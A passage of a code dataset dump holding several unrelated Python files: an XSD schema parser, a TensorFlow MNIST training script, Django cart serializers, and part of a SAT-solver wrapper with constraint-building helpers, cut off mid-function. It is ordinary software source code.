in obj.imports]\n xsi_ns = Namespace.XSI.value\n if xsi_ns in obj.ns_map.values() and xsi_ns not in imp_namespaces:\n obj.imports.insert(0, xsd.Import(namespace=xsi_ns))\n\n def resolve_schemas_locations(self, obj: xsd.Schema):\n \"\"\"Resolve the locations of the schema overrides, redefines, includes\n and imports relatively to the schema location.\"\"\"\n if not self.location:\n return\n\n obj.location = self.location\n for over in obj.overrides:\n over.location = self.resolve_path(over.schema_location)\n\n for red in obj.redefines:\n red.location = self.resolve_path(red.schema_location)\n\n for inc in 
obj.includes:\n inc.location = self.resolve_path(inc.schema_location)\n\n for imp in obj.imports:\n imp.location = self.resolve_local_path(imp.schema_location, imp.namespace)\n\n def resolve_path(self, location: Optional[str]) -> Optional[str]:\n \"\"\"Resolve the given location string relatively the schema location\n path.\"\"\"\n\n return urljoin(self.location, location) if self.location and location else None\n\n def resolve_local_path(\n self, location: Optional[str], namespace: Optional[str]\n ) -> Optional[str]:\n \"\"\"Resolve the given namespace to one of the local standard schemas or\n fallback to the external file path.\"\"\"\n\n common_ns = Namespace.get_enum(namespace)\n if common_ns:\n return common_ns.location\n\n return self.resolve_path(location)\n\n def end_attribute(self, obj: T, element: Element):\n \"\"\"Assign the schema's default form for attributes if the given\n attribute form is None.\"\"\"\n if isinstance(obj, xsd.Attribute) and obj.form is None and self.attribute_form:\n obj.form = FormType(self.attribute_form)\n\n def end_complex_type(self, obj: T, element: Element):\n \"\"\"Prepend an attribute group reference when default attributes\n apply.\"\"\"\n if not isinstance(obj, xsd.ComplexType):\n return\n\n if obj.default_attributes_apply and self.default_attributes:\n attribute_group = xsd.AttributeGroup(ref=self.default_attributes)\n obj.attribute_groups.insert(0, attribute_group)\n\n if not obj.open_content:\n obj.open_content = self.default_open_content\n\n def end_default_open_content(self, obj: T, element: Element):\n \"\"\"Set the instance default open content to be used later as a property\n for all extensions and restrictions.\"\"\"\n if isinstance(obj, xsd.DefaultOpenContent):\n if obj.any and obj.mode == Mode.SUFFIX:\n obj.any.index = sys.maxsize\n\n self.default_open_content = obj\n\n def end_element(self, obj: T, element: Element):\n \"\"\"Assign the schema's default form for elements if the given element\n form is None.\"\"\"\n if isinstance(obj, xsd.Element) and obj.form is None and self.element_form:\n obj.form = FormType(self.element_form)\n\n def end_extension(self, obj: T, element: Element):\n \"\"\"Set the open content if any to the given extension.\"\"\"\n if isinstance(obj, xsd.Extension) and not obj.open_content:\n obj.open_content = self.default_open_content\n\n @classmethod\n def end_open_content(cls, obj: T, element: Element):\n \"\"\"Adjust the index to trick later processors into putting attributes\n derived from this open content last in classes.\"\"\"\n if isinstance(obj, xsd.OpenContent):\n if obj.any and obj.mode == Mode.SUFFIX:\n obj.any.index = sys.maxsize\n\n def end_restriction(self, obj: T, element: Element):\n \"\"\"Set the open content if any to the given restriction.\"\"\"\n if isinstance(obj, xsd.Restriction) and not obj.open_content:\n obj.open_content = self.default_open_content\n\n def end_schema(self, obj: T, element: Element):\n \"\"\"Normalize various properties for the schema and it's children.\"\"\"\n if isinstance(obj, xsd.Schema):\n self.set_schema_forms(obj)\n self.set_schema_namespaces(obj, element)\n self.add_default_imports(obj)\n self.resolve_schemas_locations(obj)\n","sub_path":"xsdata/codegen/parsers/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":8162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"264294254","text":"#!/usr/bin/env python\n# Copyright 2016 Google Inc. 
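# --- Editor's note: standalone illustrative sketch; not part of the dataset records around it. ---
# resolve_path in the SchemaParser record above delegates to
# urllib.parse.urljoin, which resolves a relative schemaLocation against the
# including schema's own location (the example.com URLs are hypothetical):
from urllib.parse import urljoin

assert urljoin("http://example.com/schemas/a.xsd", "common/b.xsd") == \
    "http://example.com/schemas/common/b.xsd"
assert urljoin("http://example.com/schemas/a.xsd", "../c.xsd") == \
    "http://example.com/c.xsd"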
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nimport argparse\nimport math\nimport os\nimport time\n\nfrom six.moves import xrange # pylint: disable=redefined-builtin\nimport tensorflow as tf\nfrom tensorflow.contrib.learn.python.learn.datasets.mnist import read_data_sets\n\n\n# Define some constants.\n# The MNIST dataset has 10 classes, representing the digits 0 through 9.\nNUM_CLASSES = 10\n# The MNIST images are always 28x28 pixels.\nIMAGE_SIZE = 28\nIMAGE_PIXELS = IMAGE_SIZE * IMAGE_SIZE\n# Batch size. Must be evenly dividable by dataset sizes.\nBATCH_SIZE = 100\nEVAL_BATCH_SIZE = 3\n# Number of units in hidden layers.\nHIDDEN1_UNITS = 128\nHIDDEN2_UNITS = 32\n\nFLAGS = None\n\n\n# data_sets = read_data_sets(FLAGS.data_dir, False)\n\n\n# Build inference graph.\ndef mnist_inference(images, hidden1_units, hidden2_units):\n \"\"\"Build the MNIST model up to where it may be used for inference.\n Args:\n images: Images placeholder.\n hidden1_units: Size of the first hidden layer.\n hidden2_units: Size of the second hidden layer.\n Returns:\n logits: Output tensor with the computed logits.\n \"\"\"\n # Hidden 1\n with tf.name_scope('hidden1'):\n weights = tf.Variable(\n tf.truncated_normal([IMAGE_PIXELS, hidden1_units],\n stddev=1.0 / math.sqrt(float(IMAGE_PIXELS))),\n name='weights')\n biases = tf.Variable(tf.zeros([hidden1_units]),\n name='biases')\n hidden1 = tf.nn.relu(tf.matmul(images, weights) + biases)\n # Hidden 2\n with tf.name_scope('hidden2'):\n weights = tf.Variable(\n tf.truncated_normal([hidden1_units, hidden2_units],\n stddev=1.0 / math.sqrt(float(hidden1_units))),\n name='weights')\n biases = tf.Variable(tf.zeros([hidden2_units]),\n name='biases')\n hidden2 = tf.nn.relu(tf.matmul(hidden1, weights) + biases)\n # Linear\n with tf.name_scope('softmax_linear'):\n weights = tf.Variable(\n tf.truncated_normal([hidden2_units, NUM_CLASSES],\n stddev=1.0 / math.sqrt(float(hidden2_units))),\n name='weights')\n biases = tf.Variable(tf.zeros([NUM_CLASSES]),\n name='biases')\n logits = tf.matmul(hidden2, weights) + biases\n\n # Uncomment the following line to see what we have constructed.\n tf.train.write_graph(tf.get_default_graph().as_graph_def(),\n \"/tmp\", \"inference.pbtxt\", as_text=True)\n return logits\n\n\n# Build training graph.\ndef mnist_training(logits, labels, learning_rate):\n \"\"\"Build the training graph.\n\n Args:\n logits: Logits tensor, float - [BATCH_SIZE, NUM_CLASSES].\n labels: Labels tensor, int32 - [BATCH_SIZE], with values in the\n range [0, NUM_CLASSES).\n learning_rate: The learning rate to use for gradient descent.\n Returns:\n train_op: The Op for training.\n loss: The Op for calculating loss.\n \"\"\"\n # Create an operation that calculates loss.\n labels = tf.to_int64(labels)\n cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(\n logits, labels, name='xentropy')\n loss = tf.reduce_mean(cross_entropy, name='xentropy_mean')\n # Create the 
gradient descent optimizer with the given learning rate.\n optimizer = tf.train.GradientDescentOptimizer(learning_rate)\n # Create a variable to track the global step.\n global_step = tf.Variable(0, name='global_step', trainable=False)\n # Use the optimizer to apply the gradients that minimize the loss\n # (and also increment the global step counter) as a single training step.\n train_op = optimizer.minimize(loss, global_step=global_step)\n\n # Uncomment the following line to see what we have constructed.\n # tf.train.write_graph(tf.get_default_graph().as_graph_def(),\n # \"/tmp\", \"train.pbtxt\", as_text=True)\n\n return train_op, loss\n\n\ndef main(_):\n \"\"\"Build the full graph for feeding inputs, training, and\n saving checkpoints. Run the training. Then, load the saved graph and\n run some predictions.\"\"\"\n\n # Get input data: get the sets of images and labels for training,\n # validation, and test on MNIST.\n data_sets = read_data_sets(FLAGS.data_dir, False)\n\n mnist_graph = tf.Graph()\n with mnist_graph.as_default():\n # Generate placeholders for the images and labels.\n images_placeholder = tf.placeholder(tf.float32)\n labels_placeholder = tf.placeholder(tf.int32)\n tf.add_to_collection(\"images\", images_placeholder) # Remember this Op.\n tf.add_to_collection(\"labels\", labels_placeholder) # Remember this Op.\n\n # Build a Graph that computes predictions from the inference model.\n logits = mnist_inference(images_placeholder,\n HIDDEN1_UNITS,\n HIDDEN2_UNITS)\n tf.add_to_collection(\"logits\", logits) # Remember this Op.\n\n # Add to the Graph the Ops that calculate and apply gradients.\n train_op, loss = mnist_training(\n logits, labels_placeholder, 0.01)\n\n # prediction accuracy\n _, indices_op = tf.nn.top_k(logits)\n flattened = tf.reshape(indices_op, [-1])\n correct_prediction = tf.cast(\n tf.equal(labels_placeholder, flattened), tf.float32)\n accuracy = tf.reduce_mean(correct_prediction)\n\n # Define info to be used by the SummaryWriter. This will let\n # TensorBoard plot values during the training process.\n loss_summary = tf.scalar_summary(\"loss\", loss)\n acc_summary = tf.scalar_summary(\"accuracy\", accuracy)\n train_summary_op = tf.merge_summary([loss_summary, acc_summary])\n\n # Add the variable initializer Op.\n init = tf.initialize_all_variables()\n\n # Create a saver for writing training checkpoints.\n saver = tf.train.Saver()\n\n # Create a summary writer.\n print(\"Writing Summaries to %s\" % FLAGS.model_dir)\n train_summary_writer = tf.train.SummaryWriter(FLAGS.model_dir)\n\n # Uncomment the following line to see what we have constructed.\n # tf.train.write_graph(tf.get_default_graph().as_graph_def(),\n # \"/tmp\", \"complete.pbtxt\", as_text=True)\n\n # Run training for MAX_STEPS and save checkpoint at the end.\n with tf.Session(graph=mnist_graph) as sess:\n # Run the Op to initialize the variables.\n sess.run(init)\n\n # Start the training loop.\n for step in xrange(FLAGS.num_steps):\n # Read a batch of images and labels.\n images_feed, labels_feed = data_sets.train.next_batch(BATCH_SIZE)\n\n # Run one step of the model. The return values are the activations\n # from the `train_op` (which is discarded) and the `loss` Op. 
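# --- Editor's note: standalone illustrative sketch; not part of the dataset record around it. ---
# mnist_inference above is two ReLU layers plus a linear readout:
# logits = relu(relu(x @ W1 + b1) @ W2 + b2) @ W3 + b3, with weights drawn at
# stddev 1/sqrt(fan_in). A framework-free numpy rendering of that forward pass
# (plain normal instead of TF's truncated normal; shapes match the record):
import numpy as np

rng = np.random.default_rng(0)
x = rng.normal(size=(100, 784))                        # batch of flat images
W1, b1 = rng.normal(size=(784, 128)) * 784 ** -0.5, np.zeros(128)
W2, b2 = rng.normal(size=(128, 32)) * 128 ** -0.5, np.zeros(32)
W3, b3 = rng.normal(size=(32, 10)) * 32 ** -0.5, np.zeros(10)

relu = lambda a: np.maximum(a, 0)
logits = relu(relu(x @ W1 + b1) @ W2 + b2) @ W3 + b3   # shape (100, 10)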
To\n # inspect the values of your Ops or variables, you may include them\n # in the list passed to sess.run() and the value tensors will be\n # returned in the tuple from the call.\n _, loss_value, tsummary, acc = sess.run(\n [train_op, loss, train_summary_op, accuracy],\n feed_dict={images_placeholder: images_feed,\n labels_placeholder: labels_feed})\n if step % 100 == 0:\n # Write summary info\n train_summary_writer.add_summary(tsummary, step)\n if step % 1000 == 0:\n # Print loss/accuracy info\n print('----Step %d: loss = %.4f' % (step, loss_value))\n print(\"accuracy: %s\" % acc)\n\n print(\"\\nWriting checkpoint file.\")\n checkpoint_file = os.path.join(FLAGS.model_dir, 'checkpoint')\n saver.save(sess, checkpoint_file, global_step=step)\n _, loss_value = sess.run(\n [train_op, loss],\n feed_dict={images_placeholder: data_sets.test.images,\n labels_placeholder: data_sets.test.labels})\n print(\"Test set loss: %s\" % loss_value)\n\n # Run evaluation based on the saved checkpoint.\n with tf.Session(graph=tf.Graph()) as sess:\n checkpoint_file = tf.train.latest_checkpoint(FLAGS.model_dir)\n print(\"\\nRunning evaluation based on saved checkpoint.\")\n print(\"checkpoint file: {}\".format(checkpoint_file))\n # Load the saved meta graph and restore variables\n saver = tf.train.import_meta_graph(\"{}.meta\".format(checkpoint_file))\n saver.restore(sess, checkpoint_file)\n\n # Retrieve the Ops we 'remembered'.\n logits = tf.get_collection(\"logits\")[0]\n images_placeholder = tf.get_collection(\"images\")[0]\n labels_placeholder = tf.get_collection(\"labels\")[0]\n\n # Add an Op that chooses the top k predictions.\n eval_op = tf.nn.top_k(logits)\n\n # Run evaluation.\n images_feed, labels_feed = data_sets.validation.next_batch(\n EVAL_BATCH_SIZE)\n prediction = sess.run(eval_op,\n feed_dict={images_placeholder: images_feed,\n labels_placeholder: labels_feed})\n for i in range(len(labels_feed)):\n print(\"Ground truth: %d\\nPrediction: %d\" %\n (labels_feed[i], prediction.indices[i][0]))\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--data_dir', type=str, default='MNIST_data',\n help='Directory for storing data')\n parser.add_argument('--num_steps', type=int,\n default=25000,\n help='Number of training steps to run')\n parser.add_argument('--model_dir', type=str,\n default=os.path.join(\n \"/tmp/tfmodels/mnist_layers\",\n str(int(time.time()))),\n help='Directory for storing model info')\n FLAGS = parser.parse_args()\n tf.app.run()\n","sub_path":"workshop_sections/mnist_series/mnist_layers.py","file_name":"mnist_layers.py","file_ext":"py","file_size_in_byte":10662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"300264219","text":"from django.utils.translation import ugettext_lazy as _\nfrom rest_framework import serializers\n\nfrom mamicart.cart.models import Cart, CartItem\nfrom mamicart.users.models import User\n\n\nclass CartSerializer(serializers.ModelSerializer):\n class Meta:\n model = Cart\n fields = (\n 'pk',\n 'title',\n 'owner',\n 'members',\n 'created_at',\n 'updated_at',\n 'created_by',\n )\n read_only_fields = (\n 'pk',\n 'created_at',\n 'updated_at',\n 'created_by',\n )\n\n def create(self, validated_data):\n user = self.context['request'].user\n\n # Set owner and created_by fields automatically on create\n validated_data.update({\n 'owner': user,\n 'created_by': user,\n })\n\n # Owner should be automatically added to a list of members\n members = validated_data.pop('members', 
[])\n members.append(user)\n validated_data['members'] = members\n\n return super().create(validated_data)\n\n def validate_owner(self, value):\n user = self.context['request'].user\n\n if self.instance:\n if value != self.instance.owner and user != self.instance.owner:\n raise serializers.ValidationError(_(\"Only owner can change ownership of a cart\"))\n\n return value\n\n\nclass CartItemSerializer(serializers.ModelSerializer):\n class Meta:\n model = CartItem\n fields = (\n 'pk',\n 'title',\n 'is_completed',\n 'cart',\n 'assignee',\n 'created_at',\n 'updated_at',\n 'created_by',\n )\n read_only_fields = (\n 'pk',\n 'created_at',\n 'updated_at',\n 'created_by',\n )\n\n def create(self, validated_data):\n user = self.context['request'].user\n\n validated_data.update({\n # Can't set assignee on create\n 'assignee': None,\n # Set created_by field automatically on create\n 'created_by': user,\n })\n\n return super().create(validated_data)\n\n def validate_assignee(self, value):\n user = self.context['request'].user\n\n # Cart item can have no assignee\n if value is None:\n return value\n\n if self.instance and self.instance.cart:\n if user != self.instance.cart.owner:\n raise serializers.ValidationError(_(\"Only owner of a cart can assign cart items\"))\n\n if not self.instance.cart.members.filter(pk=value.pk).exists():\n raise serializers.ValidationError(_(\"Cart item can only be assigned to a cart member\"))\n\n return value\n\n def validate_cart(self, value):\n user = self.context['request'].user\n\n if self.instance: # Update\n if value != self.instance.cart:\n if user != self.instance.cart.owner:\n raise serializers.ValidationError(\n _(\"Only owner of a current cart can move item into another new cart\")\n )\n\n if user != value.owner:\n raise serializers.ValidationError(\n _(\"Only owner of a cart can add or move items into his cart\")\n )\n\n return value\n\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = (\n 'pk',\n 'username',\n 'first_name',\n 'last_name',\n )\n read_only_fields = (\n 'pk',\n )\n","sub_path":"mamicart/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"422479165","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n##\n## solver.py\n##\n## Created on: Sep 24, 2019\n## Author: Jonatan D. Westholm \n## E-mail: jonatanwestholm@gmail.com\n##\n\n\"\"\"\n ===============\n Module Details\n ===============\n\n\"\"\"\n\n\nfrom pysat.solvers import Solver\nfrom pysat.card import CardEnc, EncType, ITotalizer\nfrom pysat.formula import CNF\n\nfrom sugarrush.utils import flatten_simple as flatten\nfrom sugarrush.utils import dbg, a_eq_i, is_iter\n\n\nclass SugarRush(Solver):\n \"\"\"\n Quality-of-life wrapper for pysat.solvers.Solver\n\n * Does automatic bookkeeping of literals.\n * When calling constraint builders, new literals are assigned,\n that do not interfere with existing literals. \n * New literals can also be created and accessed by :meth:`var`.\n * After solving, the solution value for a given var, \n can be obtained by :meth:`solution_value`.\n * Constraint builders return CNF's, \n but do not add them automatically to the model.\n\n\n \"\"\"\n def __init__(self, name=\"glucose4\"):\n super().__init__(name=name)\n self.var2val = {}\n self.lits = set([0])\n\n def var(self):\n \"\"\"\n **Added in SugarRush**\\n\n Return a new unused variable. 
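# ---------------------------------------------------------------------------
# Hypothetical use of the CartSerializer above from a view or test; the helper
# name and the bare `request` object are illustrative. The point of create()
# is that owner/created_by come from request.user and the owner is always
# appended to `members`, so a client only needs to send a title.
def create_cart_for(request, title):
    serializer = CartSerializer(
        data={"title": title, "members": []},
        context={"request": request},  # create()/validate_owner read request.user
    )
    serializer.is_valid(raise_exception=True)
    return serializer.save()           # owner, created_by and members filled in
# ---------------------------------------------------------------------------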
\n \"\"\"\n self.lits.add(self._top_id() + 1)\n return self._top_id()\n\n def add(self, c):\n \"\"\"\n **Added in SugarRush**\\n\n If c is iterable of iterable of ints, then interpret as CNF.\n If c is iterable of ints (simple list of literals), \n then interpet as single clause.\\n\n Simple list of literals:\n\n .. code-block:: python\n\n >>> from sugarrush.solver import SugarRush\n >>> with SugarRush() as solver:\n X = [solver.var() for _ in range(6)]\n solver.add(X)\n solver.solve()\n print(solver.solution_values(X))\n [1, 0, 0, 0, 0, 0]\n\n List of list of literals:\n\n .. code-block:: python\n\n >>> from sugarrush.solver import SugarRush\n >>> with SugarRush() as solver:\n X = [solver.var() for _ in range(6)]\n solver.add([X])\n solver.solve()\n print(solver.solution_values(X))\n [1, 0, 0, 0, 0, 0]\n\n Normal CNF:\n\n .. code-block:: python\n\n >>> from sugarrush.solver import SugarRush\n >>> with SugarRush() as solver:\n X = [solver.var() for _ in range(6)]\n solver.add([X[:3], X[3:]])\n solver.solve()\n print(solver.solution_values(X))\n [1, 0, 0, 1, 0, 0]\n\n \"\"\"\n for elem in c:\n try:\n iter(elem)\n except TypeError:\n self._add(c) # c is list of ints\n break\n self._add(*c) # c is list of lists of ints\n break\n\n def _add(self, *clauses):\n for clause in clauses:\n self._add_clause(clause)\n\n def _add_clause(self, clause):\n self._add_lits(clause)\n self.add_clause(clause)\n\n def _add_lits(self, lits):\n \"\"\"\n **Added in SugarRush**\\n\n Update the internal set of literals.\n \"\"\"\n for lit in lits:\n self.lits.add(abs(lit))\n\n def _add_lits_from(self, cnf):\n \"\"\"\n **Added in SugarRush**\\n\n Update the internal set of literals from a CNF.\n \"\"\"\n self._add_lits(flatten(cnf))\n\n def _top_id(self):\n \"\"\"\n **Added in SugarRush**\\n\n Return the largest valued literal in use by the model.\n \"\"\"\n return max(self.lits)\n\n def _init_var2val(self):\n \"\"\"\n **Added in SugarRush**\\n\n Initialize a mapping to the solved values. The mapping \n is such that **var2val[var]** has the same boolean value as \n :param:`var` in the satisfying assignment.\n \"\"\"\n for val in self.get_model():\n if abs(val) in self.lits:\n self.var2val[abs(val)] = (val > 0) * 1 # 1-indexed\n\n def solve(self, **kwargs):\n ret = super().solve(**kwargs)\n self.solver_called = True\n return ret\n\n def solution_value(self, var):\n \"\"\"\n **Added in SugarRush**\\n\n Get solved value of **var**. 
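# ---------------------------------------------------------------------------
# Why the _top_id() bookkeeping above matters: pysat's cardinality encoders
# mint auxiliary variables strictly above the top_id they are given, so
# passing the model's current maximum literal keeps fresh auxiliaries from
# colliding with variables the model already owns. A solver-free sketch with
# bare pysat (literal values illustrative):
from pysat.card import CardEnc, EncType

cnf = CardEnc.atmost(lits=[1, 2, 3, 4], bound=2,
                     encoding=EncType.seqcounter, top_id=10)
for clause in cnf.clauses:
    # every literal is either one of the four inputs or an auxiliary above 10
    assert all(abs(lit) <= 4 or abs(lit) > 10 for lit in clause)
# ---------------------------------------------------------------------------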
Must not be run before successful solve.\n \"\"\"\n try:\n _ = self.solver_called\n except AttributeError:\n raise TypeError(\"Solver.solution_value() called before model solved\")\n \n if (not self.var2val) or self.solver_called:\n self._init_var2val()\n self.solver_called = False\n \n if var not in self.var2val:\n return 0\n else:\n return self.var2val[var]\n\n def solution_values(self, variables):\n \"\"\"\n **Added in SugarRush**\\n\n List version of :meth:`solution_value`.\n \"\"\"\n return [self.solution_value(var) for var in variables]\n\n def print_stats(self):\n \"\"\"\n **Added in SugarRush**\\n\n Print number of variables and number of clauses used by the solver.\n \"\"\"\n print(\"Nof variables:\", self.nof_vars())\n print(\"Nof clauses:\", self.nof_clauses())\n\n def print_values(self):\n \"\"\"\n **Added in SugarRush**\\n\n Print full mapping from vars to boolean values\n \"\"\"\n for var, val in sorted(self.var2val.items()):\n print(\"{}: {}\".format(var, val))\n\n \"\"\"\n Constructs\n \"\"\"\n def equals(self, lits, bound=1, encoding=EncType.seqcounter):\n \"\"\"\n **Added in SugarRush**\\n\n Uses :meth:`pysat.card.CardEnc.equals`.\n Adds automatic bookkeeping of literals.\n \"\"\"\n cnf = CardEnc.equals(lits=lits,\n bound=bound,\n encoding=encoding,\n top_id=self._top_id())\n clauses = cnf.clauses\n self._add_lits_from(clauses)\n return clauses\n\n def atmost(self, lits, bound=1, encoding=EncType.seqcounter):\n \"\"\"\n **Added in SugarRush**\\n\n Uses :meth:`pysat.card.CardEnc.atmost`.\n Adds automatic bookkeeping of literals.\n \"\"\"\n cnf = CardEnc.atmost(lits=lits,\n bound=bound,\n encoding=encoding,\n top_id=self._top_id())\n clauses = cnf.clauses\n self._add_lits_from(clauses)\n return clauses\n #self.add(clauses)\n #return cnf.clauses\n\n def negate(self, clauses):\n \"\"\"\n **Added in SugarRush**\\n\n Uses :meth:`pysat.formula.CNF.negate`.\n Adds automatic bookkeeping of literals.\n \"\"\"\n cnf = CNF(from_clauses=clauses)\n neg = cnf.negate(topv=self._top_id())\n neg_clauses = neg.clauses\n self._add_lits_from(neg_clauses)\n #neg_force = [[-auxvar] for auxvar in neg.auxvars]\n #print(neg_force)\n #self.add(neg_force)\n #print(neg.auxvars)\n #self.add([neg.auxvars])\n return neg_clauses\n\n def int2binvec(solver, x, N):\n \"\"\"\n **Added in SugarRush**\\n\n Given an integer, return an N-length binary vector \n and clauses equal to that integer.\n \"\"\"\n if is_iter(x):\n return x, []\n else:\n i = x\n x = [solver.var() for _ in range(N)]\n return x, a_eq_i(x, i)\n\n def xor(self, x1, x2):\n \"\"\"\n **Added in SugarRush**\\n\n Returns an indicator t <=> xor(x1, x2),\n and clauses.\n Adds automatic bookkeeping of literals.\n \"\"\"\n\n t = self.var()\n clauses = [[-t, x1, x2], [-t, -x1, -x2], [t, x1, -x2], [t, -x1, x2]]\n return t, clauses\n\n def parity(self, X):\n \"\"\"\n **Added in SugarRush**\\n\n Returns an indicator t, for whether the \n sum of X is even (t=0) or odd (t=1).\n Adds automatic bookkeeping of literals.\n \"\"\"\n\n if len(X) == 0:\n raise ValueError(\"Cannot take parity of zero variables\")\n\n clauses = []\n t = X[0]\n\n for x in X[1:]:\n t, c = self.xor(x, t)\n clauses.extend(c)\n\n return t, clauses\n\n def less(self, a, b):\n return self.less_(a, b, strict=True)\n\n def leq(self, a, b):\n return self.less_(a, b, strict=False)\n\n def less_(self, a, b, strict):\n \"\"\"\n **Added in SugarRush**\\n\n Return indicator and constraints for a less than b.\n if strict: a < b\n if not strict: a <= b\n Adds automatic bookkeeping of literals.\n 
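# ---------------------------------------------------------------------------
# The four clauses returned by xor() above are the standard Tseytin encoding
# of t <=> (x1 XOR x2). A solver-free brute-force check over all assignments:
from itertools import product

def clauses_hold(clauses, assign):
    # a CNF holds if every clause has at least one satisfied literal
    return all(any(assign[abs(l)] == (l > 0) for l in c) for c in clauses)

x1, x2, t = 1, 2, 3
xor_clauses = [[-t, x1, x2], [-t, -x1, -x2], [t, x1, -x2], [t, -x1, x2]]
for a, b in product([False, True], repeat=2):
    # exactly one value of t satisfies all four clauses, and it equals a XOR b
    models = [tv for tv in (False, True)
              if clauses_hold(xor_clauses, {x1: a, x2: b, t: tv})]
    assert models == [a != b]
# ---------------------------------------------------------------------------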
\"\"\"\n\n if is_iter(a):\n N = len(a)\n else:\n N = len(b) # b better be iterable then\n\n a, cnfa = self.int2binvec(a, N)\n b, cnfb = self.int2binvec(b, N)\n print(cnfa, cnfb)\n cnf = cnfa + cnfb\n\n assert len(a) == len(b)\n last_iteration = len(a) - 1\n\n ti_1 = None # t(i - 1)\n for iteration, (ai, bi) in enumerate(zip(a, b)):\n # The t's indicate that given the current assumptions\n # about the literals, the constraint is already fulilled.\n # If ti becomes true anywhere,\n # then this will propagate to all subsequent clauses,\n # and pop them.\n if ti_1 is None:\n already_smaller = [[-ai], [bi]]\n else:\n already_smaller = [[ti_1, -ai], [ti_1, bi]]\n ti, ti_bind = self.indicator(already_smaller)\n cnf.extend(ti_bind)\n if iteration is last_iteration and strict:\n pass\n elif iteration is last_iteration and not strict:\n ti, ti_bind = self.indicator([[ti, -ai, bi]])\n cnf.extend(ti_bind)\n else:\n cnf.append([ti, -ai, bi]) # ti OR (ai <= bi) == (ti OR !ai OR bi)\n ti_1 = ti\n return ti, cnf\n\n def plus(self, a, b, z):\n \"\"\"\n **Added in SugarRush**\\n\n Constrains \n z = (a + b) % 2**N\n N == len(a) == len(b) == len(z)\n for the inputs that are binary vectors, \n integer inputs are converted to binary vectors.\n\n In other words, uintN addition.\n The leftmost bit is assumed to be the highest bit.\n \"\"\"\n\n if is_iter(a):\n N = len(a)\n elif is_iter(b):\n N = len(b)\n else:\n N = len(z)\n\n a, cnfa = self.int2binvec(a, N)\n b, cnfb = self.int2binvec(b, N)\n z, cnfz = self.int2binvec(z, N)\n assert len(a) == len(b) == len(z)\n cnf = cnfa + cnfb + cnfz\n\n return cnf + self.plus_(a, b, z)\n\n def plus_(self, a, b, z):\n \"\"\"\n **Added in SugarRush**\\n\n Internal method\n Constrains \n z = (a + b) % 2**N\n N == len(a) == len(b) == len(z)\n\n In other words, uintN addition.\n The leftmost bit is assumed to be the highest bit.\n \"\"\"\n\n cnf = []\n carry = None\n for ap, bp, zp in zip(a[::-1], b[::-1], z[::-1]):\n if carry is None:\n t, t_bind = self.parity([ap, bp])\n carry = self.var()\n cnf.extend([[-carry, ap], [-carry, bp], [carry, -ap, -bp]]) # carry == ap AND bp\n else:\n t, t_bind = self.parity([ap, bp, carry])\n carry_1 = self.var()\n cnf.extend([[carry_1, -ap, -bp], [carry_1, -ap, -carry], [carry_1, -bp, -carry], \n [-carry_1, ap, bp], [-carry_1, ap, carry], [-carry_1, bp, carry]]) \n # carry_1 == (ap + bp + carry >= 2)\n carry = carry_1\n cnf.extend(t_bind)\n cnf.extend([[zp, -t], [-zp, t]]) # zp == t\n return cnf\n\n def element(self, v, a, z):\n cnf = []\n try:\n K = len(a)\n except TypeError:\n # the given a is an integer\n i = a\n assert i < len(v), \"list index out of range\"\n K = 0\n while 2**K < len(v):\n K += 1\n a = [self.var() for _ in range(K)]\n cnf.extend(a_eq_i(a, i))\n\n return cnf + self.element_(v, a, z)\n\n def element_(self, v, a, z):\n \"\"\"Constrain\n \n z = v[a]\n\n where a is uintK,\n z is uintN,\n v is a vector of at most 2**K uintN\n \"\"\"\n\n assert len(v) <= 2**len(a)\n assert all([len(vi) == len(z) for vi in v])\n\n cnf = []\n for i, vi in enumerate(v):\n a_eq_i_clauses = a_eq_i(a, i)\n ti, ti_bind = self.indicator(a_eq_i_clauses)\n cnf.extend(ti_bind)\n for vij, zj in zip(vi, z):\n # if ti is true then vij == zj\n cnf.extend([[-ti, -vij, zj], [-ti, vij, -zj]])\n return cnf\n\n def indicator(self, cnf):\n \"\"\"\n **Added in SugarRush**\\n\n Uses Tseytin transformation to create a variable that has the \n same boolean value as the given CNF.\n Does automatic bookkeeping of literals.\n Creates len(cnf) + 1 new variables\n\n Return 
indicator variable, and the equivalence clauses\n \"\"\"\n indicators = []\n clauses = []\n for clause in cnf:\n p, equivalence = self.indicate_disjunction(clause)\n indicators.append(p)\n clauses.extend(equivalence)\n\n p, equivalence = self.indicate_conjunction(indicators)\n clauses.extend(equivalence)\n return p, clauses\n\n def indicate_disjunction(self, clause):\n \"\"\"\n **Added in SugarRush**\\n\n p <=> (c1 OR c2 OR ... OR cn)\n \"\"\"\n if len(clause) == 1:\n return clause[0], []\n p = self.var()\n right_imp = [clause + [-p]] # p => (c1 OR c2 OR ... OR cn)\n left_imp = [[-c, p] for c in clause] # (c1 OR c2 OR ... OR cn) => p\n equivalence = right_imp + left_imp\n return p, equivalence\n\n def indicate_conjunction(self, clause):\n \"\"\"\n **Added in SugarRush**\\n\n p <=> (c1 AND c2 AND ... AND cn)\n \"\"\"\n p = self.var()\n right_imp = [[-p, c] for c in clause] # p => (c1 AND c2 AND ... AND cn)\n left_imp = [[-c for c in clause] + [p]] # (c1 AND c2 AND ... AND cn) => p\n equivalence = right_imp + left_imp\n return p, equivalence\n\n def disjunction(self, cnfs):\n \"\"\"\n **Added in SugarRush**\\n\n Uses :meth:`indicator` to create a CNF that has the same boolean value\n as the disjunction of a given set of CNF's. \n Does automatic bookkeeping of literals.\n \"\"\"\n inds = []\n clauses = []\n for cnf in cnfs:\n 